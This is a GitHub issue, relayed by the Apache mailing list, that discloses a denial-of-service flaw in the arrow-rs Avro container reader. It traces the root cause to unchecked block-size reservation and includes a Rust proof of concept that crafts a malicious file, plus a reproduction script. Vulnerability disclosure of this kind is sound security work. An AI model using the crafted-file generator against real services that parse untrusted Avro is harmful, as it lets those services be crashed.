hibrian827 opened a new issue, #10234:
URL: https://github.com/apache/arrow-rs/issues/10234

   ### Describe the bug
   
   ## Summary
   The Avro Object Container File reader in arrow-rs accepts an 
attacker-controlled block size and reserves that many bytes before validating 
that the block payload is present or bounded. A crafted OCF file with a valid 
header and a first block size of `i64::MAX` makes 
`arrow_avro::reader::ReaderBuilder` abort the process with an attempted 
allocation of 9223372036854775807 bytes, turning malformed input into a denial 
of service for applications that parse untrusted Avro uploads or imports.
   
   ## Affected
   - Pinned ref: be664614ab684ec34809361f7e868cc8c3919552
   
   ## Root cause
   The public OCF entry point `ReaderBuilder::build` accepts any `BufRead`, 
reads the container header, and constructs a `Reader` with a default block 
decoder at `arrow-avro/src/reader/mod.rs:1289`. When the caller iterates the 
reader, `Reader::read` obtains bytes from that same input with `fill_buf` at 
`arrow-avro/src/reader/mod.rs:1363` and passes the buffered block bytes 
directly into `BlockDecoder::decode` at `arrow-avro/src/reader/mod.rs:1369`. 
Inside the block decoder, the file-controlled block count is decoded at 
`arrow-avro/src/reader/block.rs:83`, then the file-controlled block size is 
decoded and converted to `usize` at `arrow-avro/src/reader/block.rs:94`. The 
sink is `arrow-avro/src/reader/block.rs:99`, where that decoded size is passed 
to `Vec::reserve` before the decoder checks whether the advertised block data 
exists, whether the sync marker can be reached, or whether the block size is 
acceptable for the implementation.
   
   ### To Reproduce
   
   <details>
   <summary>PoC</summary>
   
   inputs/src/main.rs
   ```rs
   use std::io::Cursor;
   
   use arrow_avro::reader::ReaderBuilder;
   
   fn encode_long(value: i64, out: &mut Vec<u8>) {
       let mut n = ((value << 1) ^ (value >> 63)) as u64;
       while n >= 0x80 {
           out.push((n as u8) | 0x80);
           n >>= 7;
       }
       out.push(n as u8);
   }
   
   fn encode_bytes(bytes: &[u8], out: &mut Vec<u8>) {
       encode_long(bytes.len() as i64, out);
       out.extend_from_slice(bytes);
   }
   
   fn ocf_with_block_size(block_size: i64) -> Vec<u8> {
       let schema = 
br#"{"type":"record","name":"R","fields":[{"name":"x","type":"null"}]}"#;
       let sync = [0x41u8; 16];
       let mut out = Vec::new();
   
       out.extend_from_slice(b"Obj\x01");
       encode_long(1, &mut out);
       encode_bytes(b"avro.schema", &mut out);
       encode_bytes(schema, &mut out);
       encode_long(0, &mut out);
       out.extend_from_slice(&sync);
   
       encode_long(1, &mut out);
       encode_long(block_size, &mut out);
       if block_size == 0 {
           out.extend_from_slice(&sync);
       }
       out
   }
   
   fn main() {
       let small = std::env::args().any(|arg| arg == "small");
       let bytes = if small {
           ocf_with_block_size(0)
       } else {
           ocf_with_block_size(i64::MAX)
       };
   
       let mut reader = ReaderBuilder::new()
           .build(Cursor::new(bytes))
           .expect("public ReaderBuilder accepted OCF header");
       match reader.next() {
           Some(Ok(batch)) => println!("decoded {} rows", batch.num_rows()),
           Some(Err(err)) => {
               eprintln!("reader error: {err}");
               std::process::exit(1);
           }
           None => println!("no rows"),
       }
   }
   
   ```
   run.sh
   ```sh
   #!/usr/bin/env bash
   # Self-contained PoC for INT-avro-arrow-rs-ocf-block-size-reserve-panic.
   #
   # Run from this directory:
   #   ./run.sh              # setup + build + trigger end-to-end (recommended)
   #   ./run.sh setup        # clone + checkout pinned ref only
   #   ./run.sh build        # setup, then compile/link against the cloned 
source
   #   ./run.sh trigger      # setup + build, then run the bug-triggering input
   #
   # This script is intentionally quiet — setup, build, and the trigger's
   # build-phase output go to a per-phase log file; only the reproduction
   # signal (the oracle fingerprint and/or the documented runtime
   # signature — panic / sanitizer report / wrong-output line) reaches the
   # terminal. On failure the relevant log is dumped to stderr so a reader
   # can diagnose without trawling for it.
   #
   # The upstream repo is cloned into ./source at the pinned SHA on the
   # first run and REUSED on subsequent runs (the setup phase is a no-op
   # when ./source already has HEAD at the pinned SHA). The clone is NOT
   # deleted automatically — remove it manually with `rm -rf source/` if
   # you want to reclaim disk space or force a re-clone next run.
   #
   # Expected runtime signature when the bug triggers:
   #   memory allocation of 9223372036854775807 bytes failed
   
   set -euo pipefail
   
   script_dir="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
   source_dir="$script_dir/source"
   
   UPSTREAM_REPO_URL="https://github.com/apache/arrow-rs";
   UPSTREAM_PINNED_SHA="be664614ab684ec34809361f7e868cc8c3919552"
   
   # Run a function silently, dumping its log to stderr only on failure.
   # Keeps the maintainer-facing terminal clean: success → no noise;
   # failure → enough context to know what broke and where.
   _silent() {
     local label="$1"; shift
     local log="$script_dir/.${label}.log"
     if ! "$@" > "$log" 2>&1; then
       echo "[run.sh] $label failed; log follows:" >&2
       cat "$log" >&2
       return 1
     fi
   }
   
   setup() {
     # Idempotent. If ``$source_dir`` already exists with HEAD at the
     # pinned SHA, reuse it — the clone survives across runs by design
     # (no cleanup trap; ``rm -rf source/`` manually to force a re-clone).
     # Otherwise wipe whatever's there and clone fresh: shallow fetch
     # for the exact SHA first (cheap when the server allows sha-by-
     # fetch); full clone + checkout fallback for older git or restrictive
     # upload-pack configs. After the checkout, HEAD is verified against
     # the pinned SHA so a rewritten history / wrong-SHA / partial-fetch
     # failure surfaces here instead of masquerading as a build failure
     # later.
     if [[ -d "$source_dir/.git" ]] \
        && [[ "$(git -C "$source_dir" rev-parse HEAD 2>/dev/null)" == 
"$UPSTREAM_PINNED_SHA" ]]; then
       echo "[run.sh] reusing existing $source_dir at $UPSTREAM_PINNED_SHA"
       return 0
     fi
     _setup_inner() {
       rm -rf "$source_dir"
       mkdir -p "$source_dir"
       cd "$source_dir"
       git init -q
       git remote add origin "$UPSTREAM_REPO_URL"
       if git fetch --depth 1 origin "$UPSTREAM_PINNED_SHA" -q 2>/dev/null; then
         git checkout -q FETCH_HEAD
       else
         cd "$script_dir"
         rm -rf "$source_dir"
         git clone -q "$UPSTREAM_REPO_URL" "$source_dir"
         git -C "$source_dir" checkout -q "$UPSTREAM_PINNED_SHA"
       fi
       local head
       head="$(git -C "$source_dir" rev-parse HEAD)"
       if [[ "$head" != "$UPSTREAM_PINNED_SHA" ]]; then
         echo "setup: HEAD=$head but expected $UPSTREAM_PINNED_SHA" >&2
         exit 1
       fi
     }
     _silent setup _setup_inner
     # One-line confirmation reaches the terminal — mirrors the
     # 'Pinned ref:' line in the report README so the maintainer can see
     # exactly which commit they're exercising before the proof emits.
     echo "[run.sh] reproducing against $UPSTREAM_REPO_URL @ 
$UPSTREAM_PINNED_SHA"
   }
   
   build() {
     export script_dir source_dir
     _silent build bash -c '
       set -euo pipefail
       cargo_cmd=(cargo +stable)
       if ! "${cargo_cmd[@]}" --version >/dev/null 2>&1; then
         cargo_cmd=(cargo)
       fi
       if ! "${cargo_cmd[@]}" --version >/dev/null 2>&1; then
         echo "cargo is required to build this PoC" >&2
         exit 1
       fi
   
       build_dir="$script_dir/build-scratch"
       mkdir -p "$build_dir/src"
       sed "s|@ARROW_RS@|$source_dir|g" "$script_dir/inputs/Cargo.toml" > 
"$build_dir/Cargo.toml"
       cp "$script_dir/inputs/src/main.rs" "$build_dir/src/main.rs"
       CARGO_TARGET_DIR="$build_dir/target" RUSTUP_TOOLCHAIN=1.91 
"${cargo_cmd[@]}" build --quiet --manifest-path "$build_dir/Cargo.toml"
     '
   }
   
   trigger() {
     local 
bin="$script_dir/build-scratch/target/debug/arrow-rs-avro-block-size-poc"
     local log="$script_dir/.run.log"
     if [[ ! -x "$bin" ]]; then
       echo "trigger: missing built harness at $bin" >&2
       exit 1
     fi
   
     bash -c '"$1" > "$2" 2>&1; exit 0' _ "$bin" "$log" 2>/dev/null
   
     if grep -F "memory allocation of 9223372036854775807 bytes failed" "$log"; 
then
       return 0
     fi
     echo "trigger: expected allocator-abort fingerprint not found; log 
follows:" >&2
     cat "$log" >&2
     exit 1
   }
   
   cmd="${1:-all}"
   case "$cmd" in
     setup)         setup ;;
     build)         setup; build ;;
     trigger|all|"") setup; build; trigger ;;
     *)
       echo "usage: $0 {setup|build|trigger|all}" >&2
       exit 2
       ;;
   esac
   ```
   
   </details>
   
   ```bash
   bash ./poc/run.sh
   ```
   
   ### Expected behavior
   
   ```text
   memory allocation of 9223372036854775807 bytes failed
   ```
   
   The allocator message is emitted when the harness advances the public OCF 
reader into the first block and the decoded block-size field reaches 
`Vec::reserve`. A non-zero exit without this exact allocation fingerprint would 
indicate a build or setup failure, not this reserve-before-bounds-check path.
   
   ### Additional context
   
   _No response_


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: [email protected]

For queries about this service, please contact Infrastructure at:
[email protected]

Reply via email to